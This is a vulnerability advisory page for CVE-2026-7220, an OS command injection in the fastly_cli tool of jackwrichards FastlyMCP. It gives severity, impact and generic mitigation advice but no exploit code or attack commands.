CVE-2026-7220: OS Command Injection in jackwrichards FastlyMCP
CVE-2026-7220 is a medium severity OS command injection vulnerability in jackwrichards FastlyMCP, specifically in the fastly_cli tool. The vulnerability arises from manipulation of a command argument in the fastly-mcp.mjs file, allowing remote attackers to execute arbitrary OS commands. The product uses a rolling release model, so specific affected or fixed versions are not detailed. The vendor has not yet responded to the issue report. Although a patch is indicated as available, no explicit vendor advisory or patch details have been provided. The service is cloud-hosted, so remediation may be managed by the vendor. No known exploits are currently observed in the wild.
AI Analysis
Technical Summary
This vulnerability in jackwrichards FastlyMCP up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620 involves OS command injection via an argument named 'command' in the fastly-mcp.mjs file of the fastly_cli tool. The flaw allows remote attackers to execute arbitrary OS commands without authentication. The product follows a rolling release approach, complicating version-specific tracking. The vendor was notified early but has not issued a public response or detailed remediation guidance. The CVSS 4.0 base score is 6.9, indicating medium severity. The product is cloud-hosted, implying that vendor-side patching is typical. Patch availability is indicated but no direct patch links or advisories are provided.
Potential Impact
Successful exploitation allows remote unauthenticated attackers to execute arbitrary operating system commands on the affected FastlyMCP environment. This can lead to unauthorized system control or data compromise. The medium CVSS score reflects the network attack vector and lack of required privileges or user interaction, but with limited scope and impact details. No active exploitation in the wild has been reported.
Mitigation Recommendations
Since the product is a cloud-hosted service and patch availability is indicated, it is recommended to monitor the vendor's official channels for patch deployment or updates. The vendor has not yet provided a public advisory or detailed remediation instructions. Users should verify with the vendor whether the cloud service has been updated to mitigate this vulnerability. Until official confirmation, avoid using untrusted input for command arguments in FastlyMCP environments.
CVE-2026-7220: OS Command Injection in jackwrichards FastlyMCP
Description
CVE-2026-7220 is a medium severity OS command injection vulnerability in jackwrichards FastlyMCP, specifically in the fastly_cli tool. The vulnerability arises from manipulation of a command argument in the fastly-mcp.mjs file, allowing remote attackers to execute arbitrary OS commands. The product uses a rolling release model, so specific affected or fixed versions are not detailed. The vendor has not yet responded to the issue report. Although a patch is indicated as available, no explicit vendor advisory or patch details have been provided. The service is cloud-hosted, so remediation may be managed by the vendor. No known exploits are currently observed in the wild.
CVSS v4.0
Score 6.9medium
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This vulnerability in jackwrichards FastlyMCP up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620 involves OS command injection via an argument named 'command' in the fastly-mcp.mjs file of the fastly_cli tool. The flaw allows remote attackers to execute arbitrary OS commands without authentication. The product follows a rolling release approach, complicating version-specific tracking. The vendor was notified early but has not issued a public response or detailed remediation guidance. The CVSS 4.0 base score is 6.9, indicating medium severity. The product is cloud-hosted, implying that vendor-side patching is typical. Patch availability is indicated but no direct patch links or advisories are provided.
Potential Impact
Successful exploitation allows remote unauthenticated attackers to execute arbitrary operating system commands on the affected FastlyMCP environment. This can lead to unauthorized system control or data compromise. The medium CVSS score reflects the network attack vector and lack of required privileges or user interaction, but with limited scope and impact details. No active exploitation in the wild has been reported.
Mitigation Recommendations
Since the product is a cloud-hosted service and patch availability is indicated, it is recommended to monitor the vendor's official channels for patch deployment or updates. The vendor has not yet provided a public advisory or detailed remediation instructions. Users should verify with the vendor whether the cloud service has been updated to mitigate this vulnerability. Until official confirmation, avoid using untrusted input for command arguments in FastlyMCP environments.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- VulDB
- Date Reserved
- 2026-04-27T15:32:47.599Z
- Cvss Version
- 4.0
- State
- PUBLISHED
- Remediation Level
- null
- Is Cloud Service
- true
Threat ID: 69f035e3cbff5d861094ce30
Added to database: 4/28/2026, 4:21:55 AM
Last enriched: 5/5/2026, 7:39:40 AM
Last updated: 6/12/2026, 12:17:38 PM
Views: 76
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.